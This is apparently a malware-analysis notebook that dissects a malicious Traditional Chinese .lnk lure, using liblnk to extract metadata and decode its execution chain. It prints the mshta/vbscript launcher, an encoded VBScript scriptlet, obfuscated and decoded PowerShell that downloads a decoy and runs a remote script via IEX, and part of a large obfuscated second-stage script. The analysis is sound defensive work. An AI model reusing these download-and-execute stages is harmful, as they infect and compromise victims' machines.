First, i really want to thank [Joachim Metz](https://twitter.com/joachimmetz) for creating liblnk. He also spent time correcting my n00b mistakes. Greatly appreciate his time.
Liblnk has made it much easier to analyse malicious lnk.
This is a simple Jupyter notebook that analyzes a malicious .lnk file<br>

The example which we will be going through is a lnk file.<br>

**SHA256** : ee1bb4094121de086f2bfa1de42f7e72e1fa7b3edae29b50e913803478f958bc<br>
**ITW filename** : =?UTF-8?B?44CKMjAxN+mmmea4r+WqkumrlOWFp+WuueeUn+eUouiAheiBt+alreeZvOWxleeLgOaFi+iIh+W3peS9nOe/kuaFo+iqv+afpeWgseWRiuOAiy5kb2MubG5r?=<br>
**First Submission** : 2017-10-20 10:31:30<br><br>

The purpose of this is to illustrate how easy it is for us to analyse such malicious LNK samples.<br>

We are going to run the following script in order to get the original filename of the sample.

In [ ]:
from email.header import decode_header
from email.message import Message
from email.header import Header

tmp, idn = decode_header("=?UTF-8?B?44CKMjAxN+mmmea4r+WqkumrlOWFp+WuueeUn+eUouiAheiBt+alreeZvOWxleeLgOaFi+iIh+W3peS9nOe/kuaFo+iqv+afpeWgseWRiuOAiy5kb2MubG5r?=")[0]
szFileName = tmp.decode(idn)
print(szFileName)

《2017香港媒體內容生產者職業發展狀態與工作習慣調查報告》.doc.lnk


As you can see, after decoding "**=?UTF-8?B?44CKMjAxN+mmmea4r+WqkumrlOWFp+WuueeUn+eUouiAheiBt+alreeZvOWxleeLgOaFi+iIh+W3peS9nOe/kuaFo+iqv+afpeWgseWRiuOAiy5kb2MubG5r?=**"<br>

The decoded filename is "**《2017香港媒體內容生產者職業發展狀態與工作習慣調查報告》.doc.lnk**"<br>

The filename is in Traditional Chinese<br>
Only Taiwan and Hong Kong uses Traditional Chinese<br>
The filename is "lnk" file.  So let's make sure everyone install liblnk in order to further analyse the file.

In [ ]:
# Installation of pylnk from https://pypi.org/project/liblnk-python/
!pip install liblnk-python

     |████████████████████████████████| 1.5MB 3.3MB/s 
  Created wheel for liblnk-python: filename=liblnk_python-20191221-cp36-cp36m-linux_x86_64.whl size=1079943 sha256=fc72b51593ab9b860e036222e79d27d798cd2f70d5df6d31c9b3e6142fd41f0a
  Stored in directory: /root/.cache/pip/wheels/2e/be/81/20dcb06315f8ebfc31be8623ede0b4b8a7e686c51ae8e5154a
Successfully built liblnk-python


In [ ]:
#!/usr/bin/python

'''
    lnk information extractor - 
    by Jacob Soo Lead Re

    Requirements:
    https://github.com/libyal/liblnk

    Hashes for samples:
    ee1bb4094121de086f2bfa1de42f7e72e1fa7b3edae29b50e913803478f958bc
    
'''

__author__ = "Jacob Soo Lead Re"
__version__ = "0.1"

import os, sys, struct
import argparse
from sys import argv
import binascii
import requests

try:
    import pylnk 
except ImportError:
    print("Please install liblnk from https://pypi.org/project/liblnk-python/")
    print("    pip install liblnk-python")

#---------------------------------------------------
# _log : Prints out logs for debug purposes
#---------------------------------------------------
def _log(s):
    print(s)

#-----------------------------------------------------------------------
# extract_info : This extracts the C&C information from the lnk file.
#-----------------------------------------------------------------------
def extract_info(lnkfile):
    _log("[*] Extracting information ...")
    try:
        #hLink = pylnk.open(lnkfile)
        hLink = pylnk.file()
        hLink.open(lnkfile)
        _log("[+] Drive Serial Number: %s" % hLink.get_drive_serial_number())
        _log("[+] File Creation Time: %s" % hLink.get_file_creation_time())
        _log("[+] File Modification Time: %s" % hLink.get_file_modification_time())
        _log("[+] File Access Time: %s" % hLink.get_file_access_time())
        _log("[+] Machine Identifier: %s" % hLink.get_machine_identifier())
        _log("[+] String Data: %s" % hLink.get_command_line_arguments())
    except Exception as exception:
        _log("[-] pylnk failed with error: %s" % exception)
        _log("[-] Probably some shitty or broken .lnk file")

#-------------------------------------------------------------
# check_lnk_file : Shitty Check whether file is a lnk file.
#-------------------------------------------------------------
def check_lnk_file(lnk_file):
    bLnk = False
    try:
        if pylnk.check_file_signature(lnk_file):
            bLnk = True
        return bLnk
    except:
        return bLnk

#-------------------------------------------------------------
# logo : Ascii Logos like the 90s. :P
#-------------------------------------------------------------
def logo():
    print('\n')
    print(' ______     __  __     __     ______   ______        ______     ______     ______     __  __     ______     __   __   ')
    print('/\  ___\   /\ \_\ \   /\ \   /\__  _\ /\  ___\      /\  == \   /\  == \   /\  __ \   /\ \/ /    /\  ___\   /\ "-.\ \  ')
    print('\ \___  \  \ \  __ \  \ \ \  \/_/\ \/ \ \___  \     \ \  __<   \ \  __<   \ \ \/\ \  \ \  _"-.  \ \  __\   \ \ \-.  \ ')
    print(' \/\_____\  \ \_\ \_\  \ \_\    \ \_\  \/\_____\     \ \_____\  \ \_\ \_\  \ \_____\  \ \_\ \_\  \ \_____\  \ \_\\\\"\_\\')
    print('  \/_____/   \/_/\/_/   \/_/     \/_/   \/_____/      \/_____/   \/_/ /_/   \/_____/   \/_/\/_/   \/_____/   \/_/ \/_/')
    print('\n')
    print(" Grab the lnk information!")
    print(" Jacob Soo")
    print(" Copyright (c) 2017-2020\n")
                                                                                                                      
def fetch_payload(url):
    r = requests.get(url)
    return r.content.decode()

if __name__ == "__main__":
    logo()
    # Fetch the malicious lnk from a gist.
    url = 'https://gist.githubusercontent.com/jacobsoo/5a3eda515147aa63c1681276a7e91aa2/raw/34932117cc20003a6380db194094286617f72ba5/gistfile1.txt'
    malware_str = fetch_payload(url)
    file = open("output.bin","wb")
    hb = binascii.a2b_hex(malware_str)
    file.write(hb)
    file.close()
    extract_info("output.bin")



 ______     __  __     __     ______   ______        ______     ______     ______     __  __     ______     __   __   
/\  ___\   /\ \_\ \   /\ \   /\__  _\ /\  ___\      /\  == \   /\  == \   /\  __ \   /\ \/ /    /\  ___\   /\ "-.\ \  
\ \___  \  \ \  __ \  \ \ \  \/_/\ \/ \ \___  \     \ \  __<   \ \  __<   \ \ \/\ \  \ \  _"-.  \ \  __\   \ \ \-.  \ 
 \/\_____\  \ \_\ \_\  \ \_\    \ \_\  \/\_____\     \ \_____\  \ \_\ \_\  \ \_____\  \ \_\ \_\  \ \_____\  \ \_\\"\_\
  \/_____/   \/_/\/_/   \/_/     \/_/   \/_____/      \/_____/   \/_/ /_/   \/_____/   \/_/\/_/   \/_____/   \/_/ \/_/


 Grab the lnk information!
 Jacob Soo
 Copyright (c) 2017-2020

[*] Extracting information ...
[+] Drive Serial Number: 1960101891
[+] File Creation Time: 2009-07-13 23:42:23.148084
[+] File Modification Time: 2009-07-14 01:14:25.216000
[+] File Access Time: 2009-07-13 23:42:23.148084
[+] Machine Identifier: win-jq9h4qp3a4u
[+] String Data:                                                           

As we can see from the **StringData**. The **.lnk** will execute the following command  using **mshta.exe** as we can see in the output above.
```
vbscript:Execute("dim result:result=GetObject (""script:hxxp://www[.]geocities[.]jp/bilian923/Investigation_report.wsc"")(window.close)")
```

Alternatively, you can use the following script which i've made that will get back the data which we require.<br>

The following is contents inside of **.wsc** file<br>

```javascript
<component>
<script language="VBScript.Encode">#@~^AwgAAA==@#@&m.lD+W(L^YvJA/1Dr2DR/4nV^J#c.;x,J1:[RnaP&m,2WS+.d4+Vs~,OHWh.K0r^+,POgW    (xDP~JrPEEf`Pk#P,BrwdvP,BEPbPEE,_~$kOI&xLDvPB+*@!vn82[qvnjvlWGF.y[    +0`vy@!C@*v*)&@!Gcq+T    ++0vX3{*@* n8F{W+*@*y8vf@!+mNvOG+*@*++@!Gc@!&(`Nql@! W3n) +@*{!@!G PWWF%PG1.f[@**8@!Wn.+*V{WW nNlGNvl@!+ Vl Kv*)G8@*Gl@**KGf`Fc8l[@*2l2CGcF3+*NG*Nl&`GO@*G2W{*@*v*    9XGql3y@*l!@!F @!0@*G03F,@!+R3 O`&(.N0C# W.++     nGl!@*GyNv6    {0@!G,`+@**&K{yl@*+c+*@!+PG*    +,@!8Wv1GG2.&9    X4@*c    *    {W.++K*&@!G+V+*    *0vX    +n)G*@!vO@!v8+^3W&Gv8    fPv%@**P*N)fC32l@*c*    XKv+qWF*    13G*@!W&VGyG+*    +cPv*Kv    GW.,qvq#+m3Ff249@*Cl4@!Gf@!{*0G+3+1++`F@**[`yc#vRG+*NF%@*vvKv6VGy3N)vq#FcyT32N@*yT@* W@!++` n`+cGv6    GFWnqvm    6WFPW@!{28Fc@*F q,@*vn8+G@*+R@! yNvRWGW    {cqGZ    fl`+63+0@*{G@*G{`FG    +nPv{@*+X)vW0v2WvO3F*3+,GvlW{fK +)l@*G!q+W.+ qv1@*^)v13+q@!++@!fO    &+#2&V 6    W,    ++)Gv0vl@!G23{c@*v1#+GW+q.Fc+1Gv6W++N*W@*F VvlVGZ3WPG `{W3++@*WW6    +&@*y j+,KN    l@!*8@*W     F1@*FcW+XG*(lNG*[Gy!@* WGGW3XPvNV{Z+!Kf9.+ZWyc.+%0*0G0W+vN6WGyNv9v8V{cq Z+NG{2@!{!jmjv1GFcW+TP {WyTj {@!NKlyc@*{cKvX@*+N#{Z3 Z#&9     ZN+cPGW.*#9@*{!0X4P&T    y+@*+nj 0y*0G*jvl@!v9.FT8y+`c2    W)G*K+0Gcj+[32 K 1WX[@!N`ljX4@!*f@*F,.{f@*G*8+X@*v[P cOWWW8y+Gc+W1Kvm@!*0*N@*fC.2l@**{@*{+@!v1WF*8+*    *8v^V+mGcyNF,NFcKv*@!G2     R3+ ) *G+*    +n@*Fv2CGGW+*`v[GF!#*1@*cOnjGv@*l@!{&0{W.O@*+G    +F@!{c@*v1.+0@!@!*6GGyvl@*{!@!v6.{ G{W3++)c@!vW`+&    ++K ^WyTP *qGW@!vl3+[WF!@* O@*[Nm@!*2NGW8v8V{ @*GW8+NGXZ{ K00vf#+*W{fKGf    yTP +) WWvl8+n@*FvG&m    {*Pv*KN)G!@!X^.W,)vnW{jvX@*Ff3Fc    O@*v{N+F#GWN+,@!+0@!v+j*6NGy@!*0GT    +08F+@!Fc3ynNvW@!+0@*vf    y `NqC    W,G*l.*0Vy!G W@*++Vy+)vc@!v6VGF3+qv^N+0@*+q@!+c    Ff@*GWWF @!v1V++NvFG R.+{jv%`{W{cq{Z@!fm@!y0    y0j{GjG{WFG    +8vF@*vl@!v6G&0vO@*{c#O@!*K{&0 nN+l@*{Tq WW++Kv1@!v13vO@!+q@!++V&Of+)&&K+0@!&!Kf1@*2!@!&*+nPGTWFf82F    +F     1N24VN@!CEOjhS&KBKB jndqOB@*BRjaSkDv3EPOkKJqDBjB~OdKdkPB@!vOknsrDB8vRknsk:~E    v,OUwVbY,vEu~sKI3C1CO}$9mKP~cP]m}x#2.PY)lYK(1:Fcv$/O]&x!Tfm,#~BF+#P lU~$1CCDY#~N*P_rE^v?2:R-l"kz4s2~v}sjB,vPE#~Eru[~c,^#+"8}?nhIAs+M+g/+cKG/:DrUV`#]q~2T_EavONrb1vBbErJSPZSP:Ii3@#@&yRwCAA==^#~@</script>
</component>
```
<br>

I have made a decoder for that and you will get back the following codes.<br>



```powershell
createobject("wscript.shell").run "cmd.exe /c powershell -NoProfile -NonInt "" ""$( sV 'OFs' '' ) "" + [stRIng]( '24<6e}3dW6eV65o77V2d{6f{62<6a>65}63<74W20{6ek65k74>2e}77o65>62}63<6c}69o65>6e<74<3b{dWa<24k6e}2e>70<72{6fo78{79V3d>5b<4eV65k74o2e}57}65<62k52o65}71>75>65o73{74}5d>3aW3ao47k65}74}53{79>73o74>65W6dW57W65k62>50<72<6f>78k79<28k29{3bVdkaV24V6eW2eo50>72}6f{78<79{2e>43o72W65>64W65<6e{74{69<61o6co73V3dW5b>4e{65W74V2eo43<72k65{64k65{6e}74<69<61W6ck43o61{63{68>65{5d}3ak3a>44{65o66W61o75W6ck74<43k72o65W64{65o6eW74V69W61V6ck73W3bWd>aW5b<73<74k72k69W6e{67>5d{24V68o65}78>66o6fk72k6d}61V74W20k3d>20>24<6e{2e{64o6fW77o6eW6cW6fo61{64<73}74>72W69>6e}67>28<22}68o74W74W70{3a{2fk2f>77>77{77{2e{67>65}6fk63o69k74k69o65o73o2e}6a>70W2fV62W69>6c}69k61<6e<39{32V33k2fW49W6e}76k65<73k74>69V67o61V74W69o6fo6e}5f>72k65k70k6f{72{74k2e>64o6f{63>22V29odWa<5b>42{79>74o65o5bW5do5do20>24o74k65{6dk70W20o3dV20o24V68k65k78o66}6fo72}6dW61k74W20W2do73<70V6cV69o74o20{27o20V27<doaW24>74o65>6dV70k20V3d{20}24{74V65V6d>70k5b{30W2e>2eV28W24k74V65<6dV70}2e{43{6f}75o6ek74V2dk32o29o5d<d{aV5b<53>79V73>74}65>6d{2eW49o4f}2eo46o69o6c<65k5d>3aV3a>57>72<69o74}65W41W6ck6co42}79}74o65<73W28k22}24o65{6e>76W3ao74W65{6do70V5c>49W6eV76>65<73k74V69>67{61<74>69V6f<6e<5fo72W65>70<6fV72o74k2e}64<6f{63{22o2co20{24W74<65k6do70>29>d}a<53}74}61k72>74}2do50W72o6fk63V65o73o73{20{22}24o65}6e>76o3a{74{65o6d}70<5cV49}6eo76V65>73k74W69>67}61V74}69<6f<6eV5f}72<65k70W6f}72<74k2e}64<6f>63W22{dWa{49o45V58k20o24>6ek2e}64<6fk77k6eW6c}6f>61<64{73>74o72<69k6e}67o28V27V68{74W74W70<3a<2f{2fV77V77o77W2e}67>65<6fo63k69>74V69<65o73k2e}6a>70W2fo62o69<6ck69<61<6ek39W32}33o2f<30o39>30<34W2e{70o73}31W27{29}3bkd<a'-SPLIT'o'-SPLIt'>'-SpLit'k' -sPLIt'V' -sPLiT'<'-sPlit'}'-sPliT '{' -Split 'W'| FoREacH-OBJecT{ ( [cOnVErT]::toINT16(([stRInG]$_ ) ,16) -aS [cHar]) }) +""$(SET-vaRiAblE 'OFS' ' ') ""|& ( $VeRbOSePREFereNCe.TosTrinG()[1,3]+'x'-jOiN'')""", 0, TRUE
```
<br>

Once you decoded the PowerShell, it should execute the following:<br>
```powershell
$n=new-object net.webclient;
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
[string]$hexformat = $n.downloadstring("hxxp://www[.]geocities[.]jp/bilian923/Investigation_report.doc")
[Byte[]] $temp = $hexformat -split ' '
$temp = $temp[0..($temp.Count-2)]
[System.IO.File]::WriteAllBytes("$env:temp\Investigation_report.doc", $temp)
Start-Process "$env:temp\Investigation_report.doc"
IEX $n.downloadstring('hxxp://www[.]geocities[.]jp/bilian923/0904.ps1');
```

Let's download the files.<br>
`!curl -vv www.geocities.jp/bilian923/Investigation_report.doc -o www.geocities.jp~bilian923~Investigation_report.doc--`<br>

After inpsection, "Investigation_report.doc" is actually the decoy document.<br>

```
jsoo@Pixar:~$ curl -vv www.geocities.jp/bilian923/Investigation_report.doc -o www.geocities.jp~bilian923~Investigation_report.doc--
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 118.151.231.178...
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Connected to www.geocities.jp (118.151.231.178) port 80 (#0)
> GET /bilian923/Investigation_report.doc HTTP/1.1
> Host: www.geocities.jp
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sat, 21 Oct 2017 02:02:22 GMT
< P3P: policyref="http://privacy.yahoo.co.jp/w3c/p3p_jp.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
< Last-Modified: Tue, 17 Oct 2017 02:53:39 GMT
< Accept-Ranges: bytes
< Content-Length: 204002
< Content-Type: application/msword
< Age: 0
< Connection: keep-alive
<
{ [11854 bytes data]
100  199k  100  199k    0     0   201k      0 --:--:-- --:--:-- --:--:--  203k
```
<br>

Let's download the other file.
`!curl -vv www.geocities.jp/bilian923/bilian923/0904.ps1 -o www.geocities.jp~bilian923~bilian923/0904.ps1--`<br>

```
jsoo@Pixar:~$ curl -vv www.geocities.jp/bilian923/0904.ps1 -o www.geocities.jp~bilian923~0904.ps1--
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 118.151.231.180...
* Connected to www.geocities.jp (118.151.231.180) port 80 (#0)
> GET /bilian923/0904.ps1 HTTP/1.1
> Host: www.geocities.jp
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sat, 21 Oct 2017 02:04:28 GMT
< P3P: policyref="http://privacy.yahoo.co.jp/w3c/p3p_jp.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
< Last-Modified: Mon, 04 Sep 2017 08:18:41 GMT
< Accept-Ranges: bytes
< Content-Length: 68260
< Age: 0
< Connection: keep-alive
<
{ [11889 bytes data]
100 68260  100 68260    0     0   160k      0 --:--:-- --:--:-- --:--:--  160k
```


The contents of **0904.ps1** will be like the following:<br>


```powershell
 . ( $sHElLId[1]+$SHEllid[13]+'x') ( ( '15T12<43F43F43A15T12@15H12T44,170l147H150<170A125<40A75<40F42<104@121S157l152H141c63T144S161@121S61S106H166S131H154l116<122,126<147T60@113H111S62c164<63<141F153c116H122T142<62S112T124<125l126<131,116A103A151@116T162l144c62l160T104S125<127S71,151<125H61<106@127S104l121H157,116l103S151F122A124,143l153H65@160T142l151l101A71c111H105@101c156<104S121A160T155l144<127<65<152A144<107,154H166c142@151H102S155T144A127@65A152F130F62H144l154l144@106T71T167H143c155c71,152A130H62<106T153,132,110T112F154<143S63l115T147<145S167@60,113,103,126l102H150F143c155l106H164S111<103@147T153l144H155c106,171H130,62@61S166@132c110T126l163@132A123@167@147T112T110@132c150<143F154@71H167H143T155H71A152,132F127H122,61T143,155A125l160F103S121@153S116,103A147l153S153F144S155<106F171,130A63,126c165H143H62,106@155T132A126l71l165<131F130,122,160<144c155,126S146F142H127S126T60@141,107@71T153l143T171T101H71S111,103c150T142F121c130l102@167F122T107H71@164F131,127,154T165T130,124S157F66S121c63S126F171l143,155,126c165@144A105A122A166<142,127<106T160T142T151@65c110S132F130F122<102@143F63S116A154H142l127F112S163@141,127<126,172@113c103A153F147,146H103c102<130@141T107F126@171S132F123F61H120T131T155S160c154F131S63,121l147<145,171F101T153<130S171T65S110l142<107c71<151@131,127,170S102<143c63,116S154F142c127,112c163T145c125S116<150<131,62S150A154@111c103<61S102l142H155F121A147H112<106H70,165c124@107T71T152c131,130l122F160<142<62,64F165T125T63F102A163l141A130H121H157A112S61c170c143F112,171<154H142<114T124l106H144S114A153H126T170A144H127H106S163<143F171F147,156<125,63A154<172l144F107,126S164<114H155H122c163l142@103l143<160S111H110S60H160l114T153T144H154H144l106H122S65@143,107F125T157A112@60A61F160l131F63S112T166,143<62H71l155@144A103@65@130F141S127l64T172,115T151@65<126,142S156<116H150<132S155T126l117T131,130@122@160<144c155c126@116c132,130<122A157A142,62F122<172T112<171<153c116l103T147H153T116S103<147c154,171c132T130S122c61l143F155c64c147A112<110,132F150@143T154<71H61,142l156,116A150T132,155T126l146H142S155<106F60,141<130F132c154@130@62c61F154A144,107A150c166F132S110<115<165F122l62A126A60T124c127@126,60H141<107S71l153A113,103T144c110T132<130S122c121A143T155H71c152l121c127F122H153,143T155l126S172c143<171A143c160H114<153c154c165l144A155<71H162A132l123@147l153,142F156A126A163F142S103S167H147,121@103F150c142@125l63F154l172<144S107l126S164,114,154A112<61<142H156c122l160l142S127<125S165l123l127c65<60l132A130F112S166@143<106H116F154c143c156@132@160<131H62,126c172H114A153F150H150A142T155A122l163<132c126S112H154l132l154S60H157F124,155A126c63@114,125@71F151c141A155T126T152S144@103S102S124@145F130S116S60F132@127,60S165T125l156<126S165<144l107<154S164c132c123<65F112H142F156,122<154T143c155@71H167c125,62,126c171T144c155H154@152T132,130T115H165H123<107S106l165A132H107H170A154c125T155l126l155F113S103A150l117@132S130T143H164<124F62,112H161S132@127S116<60A111F105l154S165@144H106c102l60<143l151T153<163l111A103H147,153S144@155,106A171,130<63<126S165T143c62c106H155H132@126<71l165,131S130,122S160@144T155,126F146S142H127F126H60l141T107F71@153<143,171F65F110S132S130F122c116,132T130l122<157l142S62<121@157c112l60H144H154c144H105F61H166S132c110T126T163c132A125c150l150l142@155@122<163H132S123@143A160@113<123@65c112H142l156T132<166F141H62<125l157T112A107c65,61F142l107S167c163c111l105H101c157S112l110H132<150T143T154,71,164@142l62A122<61l142l107,125c160T113F123H153@160,114H103H101F153c144,155F106H171T130<63,102A171A142,62S116T154l132l110c126<171S132c123H153l160l104H121S160F71,104,121c157c116S103@155T132l61F142F155T116S60<141T127T71c165T111l107c132S61F142S155l116F146S132F62c126T60F130H62@122F154<142F107l126c156c131A130F122T154S130,63,122A65A143F107,125@147F145F167T60H113@103,126<102@150@143c155c106S164T111@103H147,116T103T147@153F112S127T61H102<150c143T155,106F164H132,130c122T154@143S151T150l121@142c63T116<160A144,107c154H166<142F151F101A71,111@104c101S163S111l105c61,150H142,155A122<150<144l107F71<171c145<123T101<71,111A103A122c125H143c156@126@154S113S126@60c147T127F61S122T65H143A107,126T142T130S126S60@147@112A110<132H150,143,154l71c167H131,130<112<150F142c127,126c60,132A130@112H172S114,101H60c113,103,121@154@142F125@107<106,171@131H127,61F154S144<107T126H171,113T106,102,166,143l62S154H60<141c127c71S165T111A104c60S147T115l123@154F144,111S106l164l125l145<130T102H154c130H123T101F153c144A155S106@171,130H63@112S154T144F110H126H171T142@154<71<60A145S130F102l154,111,104<60S147S127<61@132S166H141F127<122c144<104@121H157S112l113H121T60,113F103l121S60,113,103S123H122,62@131T130@112A146S144H110l154H167T132H126<71T151F144<127@154T163F132H107c126S171A111,104c60@147S127l60l106A167l143c105<122S166,142<127T106<160l142H154c60@66F117T153@116H61@143<156T112A154T142A156S122T105A142@62l61T150<141<127A64T165c122A107<126F155<141H127l65l154F122A110c154F165H131l127l61,160F131l60H106F172S143S62c126A164l131A155l170<65H113c103l150H117,132<130,143H164l124S62<112l161@132c127<116@60,111,106S116c65H143T63H122l154A142S123<65F123T132S127,132,163T132@127S116<60,141H127T71l165<114c153A106H172,143H62c126S164c131H155l170A65<124A155H106T164H132l123S147l156A125c155l126<155S142@107T126H152A144,107,126c153<122c107S126<163l132l127l144A150@144H107T125l156A113@123,153F163T111l106T164<124H145S130,116A60@132l127<60S165<125,155S126T155F142H107T126c152@144,107A154@166S142H151,65,106F142T127c154l60@114T153<106<172<143@62<126,164<131A155@170S65l121@156T126<160H142H107l122H154,143c153T106S152H131T62A126S172@143F61S60c66S117,154S112A61T142@151c153<165H122<107S126F155H141c127l65T154H122S110@154A165H131F127S61<160@131A60H61A166T132A110,126c163A132l123T147<156,123,127@65F116H132A127,61T166@143l156S154S116S142<62l122F61S142F107l125,156@114F103F101H153c132A155H106c163<143,62A125H160T114T153H122c154T132A155S154S165A132F126@122S65l143@107,125c157l112<60c61S65H122c107l126F163l132l127@144T150l144c107H126c125F145<130@102c154T112S171S167l147H112A60S116S163S131S130,116T172l114H103c102S121S144F127H112S163c141l127F115A163l111,106,116l154T131<127l170,154S132A103T167<147F121c127l65H172A141F125@116T163F131l130<116<172A114@103T102T102T144,130@122@166,121F62H170S150F143c63F115A156H114H103<102,142A125<63H154<172<144F107H126S164l114c153l61S61@142A110@122F160A131l62c106c172H144c105T122S154,142@107<126T156H131T130l122A154c130@123<153l116T103H147F153c153T144A155@106S171,130,63l122,65S143T107c126A146c131@156<126@160S142A107@122F154A143T151A65,105,132<127<132A160H142c155S126l104H142S62c65l172H144,110c112,61@131S63l122F166T143l151<147A156F125,154<122H124S143F107F126A152@141S127,106c163A124S155,106H164l132@123c167l147A123<107l154T153T132F125@112F65l125<62F154F156,114T103l102A121S144<127A112l163F141c127A115c156<114T103l102@142<125l63,154A172F144l107F126T164@114T154,112<154H132H155T170A154H131@63@122l160S142l62A64c165F121@62<106,163A142,107H154F165@132T60A116S166S142l156F132<154@142l156c122S160c142@62S65S172F130<124,157S66S125l63H122F150T142H155A122l150F143l155T121l163<111F103@122@62<131,130@112T146@143S107,106c171F131@127S61S154l144S107F126H171S143S171@153@165T125<62c126H60c123,127H61S167c142H107@126l164H132@127c65,60@131H130l122c160,142<62c65H107,142F107c106,156A143T171F147S156@125c156S126,165c144c107@154l164l132A123H167H147,124l127<106@165A131T127H144S154A132c103T143H160T104,121c157H112,112H110F132A150@143S154,71<60@145A130H102c154<130S62H112A61c141,127@170T153c132T130F111<165<122,107,126A155l141F127<65@154c124H127F126F60A141S107c71,153,113H103F144,112,142F156F132A166,141T62l125,156H114T103<101@156T125T110<126S151l142<107A154<152,114,103H102<111F141H127l122<154@121T156F154H124l141@127A143F163A111l105c65T154@144S61l116@163S142A63T121F156l114F103<101T153T144F155T106F171T130<63H112c154S144l110<126S171l142H154,71,60A145@130l102A154c114F103@101c153A144T155T106A171F130S63F102T150F143T155<106@164T132<130@122<154l143S156A115c160H114<154A116F154@144H105T154l164T143F107H170c154<142T127<126S165l144c107T106<60<141,127l71,165A122l155l170H150H132@63S115<157A112,61,112H61F142A156@122<160A142@127A125F163c111A105F61H150T142,155F106T156@132l127l121l156H113F121H60,113S103,121T60l113T103T130S112F154S144,110l126c171l142S151,101H153H144c155,106@171T130S63S122A65l143l107H126F146T131l156c126H160H142,107H122T154T143l151H65,104,143c155S126A150T144S107c126A125A145<130F102<154A113<103c153l116l103F156<60l116F103@147F60@113S127c60T112A65l144S107<126S142A130<126F60H153F127@110,160H115F125<105l150F154<111T104H60@147T127l61A116A65l143F63F122@154,142S123A65F104l142H62c65T62T132A130@112c60<130<124F157F66<122c156A112H166@142F125S112A150H143F62T125<62A116<106,116T60S143@155T154,165<132T171<147<151<141@60<150A106T121<60F154l62<114c62H70<60l132H172,102,102l121l125c144l161l141F155,154T166F121F60A106c122S144@63T122,102S115H126<106l60A143F60<105<167H125l126H125c167c117,127A112<131@131l125F160l114S124@107<144,112@121A125,170F130A121@126,132<151T141S156l144S124c121H62A144S132A121T60F105@62,123<154@160c141F115,106<116F161S126@107<106F110,126<60l170T156c123l125@106l115,131c60,71F161@124,153l106H170@116l127F60S167S115S155@150H132T141@124,122T104T121S125H115l172H141F155l71l171F141F107H132c132@145,152H154c117F142F61S115,60l144l125H106A156@121@127<65H107l132A125@71S157S121@153H71F123S116S62F163<167@115S155c143A65S141A124@122H104H121F125c116H152F126c152l101l62A122S155T150l115@121@60A65,151,126<107S106T104A113,60,170A156,123A125T106@113S145c106F150F105A142,60l71F125A116H63,154<61@124c153,65T166l123H126<154H61c121<127T144A102A142@153T132,151,124l62S154c64<117H125H122H66F114c172<101A171c132,61,122<160@116A105A116@102@121,62,116<127,142<60@122T152,126T126<126c120,143@61S116F102F132c60F154@103S142T62l115H60F143H125T106S156@122H127S132c107S122,153@61,124H121<127F144S112@122T107A61,123c117H106,132H106S141l106S154l102c124F156<150l127T141,154<106l105H131T61H126,126S115F105c71@170<121H124c132,166T122,110H106l157S124F63H106S102A116F155H71H105,143H127F144A102,144A153F132H160@124T153H122A170T132,60<147l65,126l60,112A126@122A104F101<62A124F63@112F102@116F153H154F104S125@127l144T112<121H125H170,64@127l153,122T122<116S155S71@102S124<110T150@127A141c154T106@155A115c127T116A115,126c60<106H127<131@152S154l116A117@105T65<64A127H110l160@122S121,172F150<130,125<124A102T102H144@153l132c161@124@153@122S125T121<172A150H127,127S124@102,111H114,61,132,154F121H130<132,107A132A153l170T62c122S155A164c121@126F63<157A62F122,130T154@104<132F60,154H105S143@130l144,111<114S61S132A150l121,130S122@63@121l154,150H151H115<107@70,167A132H125T144c157H116c105l116F103@132c60H65c132,124@110F150F127,145l154H106,155@117S126F131S167l121@61c111c60c116,107,144S112H121l60<105@170c132@63H132c107H127c105A65A103F114<172l106<131<121T125l170c64,126@156T160T122l132,152l154@127,143<172H115l65F116F62l112H104,115c154S150@153c125S127A71F65S121c125A126T117A126l125@170H151l121c125@132F106S124l153S147c61@114l62c131c65l125F106@143<170c144S62A65c117S132H105<71c132,123l152c106c131@142A60H160c64<127c110T160T166@122,106l121A170c121T156,131F171<141,107l116c160<127T125T116l102F115A105,144l156@113T62H154c166<121c60c106,104<115F60A122c166c145H127F70l170T124F62@154l130c141,105H164H160H127F125F116S102H115c105T144T156l143S62l154<166T121,60F106T104A131S61A132F122F116l153c71S125<122c105c111A170l127l155,71S117F116S107c61c102c132T60<65<103S142F60H144S132F143l125@106c156,121,127F65F107l126@105T71c156S127T125,126H172l122T60A106l150A123H130A154c114@132A60,154F105,125,127A131A170S127<125F170A130@124S62<153F65l123<60l160c141,131S124T101F171F141H152A150,160l142l60T116l102H121c172<116@161l142T62T122c104,127A106F102S122T144T105H65@166c116T172@122<170H121,127c144A102S142S153<132F152H124F62F160T171A141F126c101l172T122T124A101<171,141c155H150@160F142,60@116l102S121A62@116@127<143T172<132<111F127c130A150S156S123<103T71F125S131c125S65l120S123S62,144<112l121l125H160@64,126,62T160c166,132<106c112H157c121A124T144F117T124F155A71<64@127F130H106S102F132F60l106A165c122@154c160,120S141H127l164<165,127<155<170<163,115,104T112<160F115F62l154@166@121@60F106<104,131H61S132,156c116@153F116l150H117F125A65@132<124S106c122l150<123c62<61@114<132H60@154F102S123H156l150F127<126S107T71S162<127l126F116<160S145l123A164S156l132A60F126,172S122H60A106,150@121,155,126T113@132l60S154@105F125,127c131T170S131S154l106S150<123H124<132l114H132A60<154F102,123T156l150@127,145l155S71c124<141A107@144@111c131<124@154S117,142T62l144,112S143A125A106T156S121T127@65T10